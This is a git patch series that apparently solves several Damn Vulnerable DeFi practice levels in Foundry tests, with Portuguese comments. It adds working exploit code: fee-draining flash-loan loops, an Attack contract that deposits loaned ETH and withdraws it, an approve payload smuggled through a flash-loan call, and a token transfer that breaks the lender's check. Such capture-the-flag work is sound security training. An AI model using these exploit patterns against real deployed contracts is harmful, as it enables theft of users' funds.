From ddc5db9207a96aeb08a33bbfeab8334612c40c3a Mon Sep 17 00:00:00 2001
From: Duarte <duartespammm@gmail.com>
Date: Tue, 7 Jan 2025 12:51:29 +0000
Subject: [PATCH 1/2] 	modified:  
 test/Levels/naive-receiver/NaiveReceiver.t.sol 	new file:  
 test/Levels/side-entrance/AttackerContract.sol 	modified:  
 test/Levels/side-entrance/SideEntrance.t.sol 	modified:  
 test/Levels/truster/Truster.t.sol 	modified:  
 test/Levels/unstoppable/Unstoppable.t.sol

---
 .../Levels/naive-receiver/NaiveReceiver.t.sol |  5 +-
 .../Levels/side-entrance/AttackerContract.sol | 52 +++++++++++++++++++
 test/Levels/side-entrance/SideEntrance.t.sol  |  8 ++-
 test/Levels/truster/Truster.t.sol             | 17 ++++++
 test/Levels/unstoppable/Unstoppable.t.sol     |  4 +-
 5 files changed, 83 insertions(+), 3 deletions(-)
 create mode 100644 test/Levels/side-entrance/AttackerContract.sol

diff --git a/test/Levels/naive-receiver/NaiveReceiver.t.sol b/test/Levels/naive-receiver/NaiveReceiver.t.sol
index 7552e9d..3a9ea99 100644
--- a/test/Levels/naive-receiver/NaiveReceiver.t.sol
+++ b/test/Levels/naive-receiver/NaiveReceiver.t.sol
@@ -48,7 +48,10 @@ contract NaiveReceiver is Test {
         /**
          * EXPLOIT START *
          */
-
+        // 1. esgotar o saldo do contrato FlashLoanReceiver, podemos usar fees
+        while (address(flashLoanReceiver).balance > 0) {
+        naiveReceiverLenderPool.flashLoan(address(flashLoanReceiver), 1);
+        }
         /**
          * EXPLOIT END *
          */
diff --git a/test/Levels/side-entrance/AttackerContract.sol b/test/Levels/side-entrance/AttackerContract.sol
new file mode 100644
index 0000000..ef5ff1e
--- /dev/null
+++ b/test/Levels/side-entrance/AttackerContract.sol
@@ -0,0 +1,52 @@
+// Layout of Contract:
+// version
+// imports
+// errors
+// interfaces, libraries, contracts
+// Type declarations
+// State variables
+// Events
+// Modifiers
+// Functions
+
+// Layout of Functions:
+// constructor
+// receive function (if exists)
+// fallback function (if exists)
+// external
+// public
+// internal
+// private
+// internal & private view & pure functions
+// external & public view & pure functions
+
+// SPDX-License-Identifier: SEE LICENSE IN LICENSE
+pragma solidity 0.8.17;
+
+// Imports
+import {Utilities} from "../../utils/Utilities.sol";
+import {Address} from "openzeppelin-contracts/utils/Address.sol";
+import "forge-std/Test.sol";
+import {SideEntranceLenderPool} from "../../../src/Contracts/side-entrance/SideEntranceLenderPool.sol";
+import {IFlashLoanEtherReceiver} from "../../../src/Contracts/side-entrance/SideEntranceLenderPool.sol";
+
+import {SideEntrance} from "./SideEntrance.t.sol";
+// contract
+
+contract Attack is IFlashLoanEtherReceiver{
+    SideEntranceLenderPool private immutable sideEntrance;
+    using Address for address payable;
+    constructor(address _sideEntrance){
+        sideEntrance = SideEntranceLenderPool(_sideEntrance);
+    }
+    function execute() external payable{
+        sideEntrance.deposit{value:msg.value}();
+    }
+
+    function attack() external{
+        sideEntrance.flashLoan(address(sideEntrance).balance);
+        sideEntrance.withdraw();
+        payable(msg.sender).sendValue(address(this).balance);
+    }
+     receive() external payable {}
+}
\ No newline at end of file
diff --git a/test/Levels/side-entrance/SideEntrance.t.sol b/test/Levels/side-entrance/SideEntrance.t.sol
index 6eb2dad..f2cb8a8 100644
--- a/test/Levels/side-entrance/SideEntrance.t.sol
+++ b/test/Levels/side-entrance/SideEntrance.t.sol
@@ -3,8 +3,8 @@ pragma solidity >=0.8.0;
 
 import {Utilities} from "../../utils/Utilities.sol";
 import "forge-std/Test.sol";
-
 import {SideEntranceLenderPool} from "../../../src/Contracts/side-entrance/SideEntranceLenderPool.sol";
+import {Attack} from "./AttackerContract.sol";
 
 contract SideEntrance is Test {
     uint256 internal constant ETHER_IN_POOL = 1_000e18;
@@ -36,6 +36,12 @@ contract SideEntrance is Test {
         /**
          * EXPLOIT START *
          */
+        // usar o eth transferido para retirar mais eth do contrato
+        // 1. impletar o ataque
+        vm.startPrank(attacker);
+        Attack attack_contract = new Attack(address(sideEntranceLenderPool));
+        attack_contract.attack();
+        vm.stopPrank();
 
         /**
          * EXPLOIT END *
diff --git a/test/Levels/truster/Truster.t.sol b/test/Levels/truster/Truster.t.sol
index 2848992..3936fc4 100644
--- a/test/Levels/truster/Truster.t.sol
+++ b/test/Levels/truster/Truster.t.sol
@@ -41,6 +41,23 @@ contract Truster is Test {
         /**
          * EXPLOIT START *
          */
+        // 1. Criar o approve
+        bytes memory data = abi.encodeWithSignature(
+        "approve(address,uint256)",
+        attacker,
+        TOKENS_IN_POOL
+        );
+
+        trusterLenderPool.flashLoan(0, attacker, address(dvt), data);
+
+        // 2. ver o allowance
+        uint256 allowance = dvt.allowance(address(trusterLenderPool), attacker);
+        console.log("Allowance after approve:", allowance);
+
+        // 3. executar a transferência
+        vm.startPrank(attacker);
+        dvt.transferFrom(address(trusterLenderPool), attacker, TOKENS_IN_POOL);
+        vm.stopPrank();
 
         /**
          * EXPLOIT END *
diff --git a/test/Levels/unstoppable/Unstoppable.t.sol b/test/Levels/unstoppable/Unstoppable.t.sol
index 8633755..df8cad4 100644
--- a/test/Levels/unstoppable/Unstoppable.t.sol
+++ b/test/Levels/unstoppable/Unstoppable.t.sol
@@ -2,7 +2,7 @@
 pragma solidity >=0.8.0;
 
 import {Utilities} from "../../utils/Utilities.sol";
-import "forge-std/Test.sol";
+import "../../../lib/forge-std/src/Test.sol";
 
 import {DamnValuableToken} from "../../../src/Contracts/DamnValuableToken.sol";
 import {UnstoppableLender} from "../../../src/Contracts/unstoppable/UnstoppableLender.sol";
@@ -60,6 +60,8 @@ contract Unstoppable is Test {
         /**
          * EXPLOIT START *
          */
+        //1. colocar fundos no contrato unstoppableLender para quebrar a validação
+        dvt.transfer(address(unstoppableLender), 1);
         /**
          * EXPLOIT END *
          */

From eb1b1cca25ba3f622fb77844b177148f89fd2259 Mon Sep 17 00:00:00 2001
From: Duarte <duartespammm@gmail.com>
Date: Tue, 7 Jan 2025 12:57:49 +0000
Subject: [PATCH 2/2] 	modified:  
 test/Levels/side-entrance/AttackerContract.sol

---
 test/Levels/side-entrance/AttackerContract.sol | 1 -
 1 file changed, 1 deletion(-)

diff --git a/test/Levels/side-entrance/AttackerContract.sol b/test/Levels/side-entrance/AttackerContract.sol
index ef5ff1e..00f2764 100644
--- a/test/Levels/side-entrance/AttackerContract.sol
+++ b/test/Levels/side-entrance/AttackerContract.sol
@@ -8,7 +8,6 @@
 // Events
 // Modifiers
 // Functions
-
 // Layout of Functions:
 // constructor
 // receive function (if exists)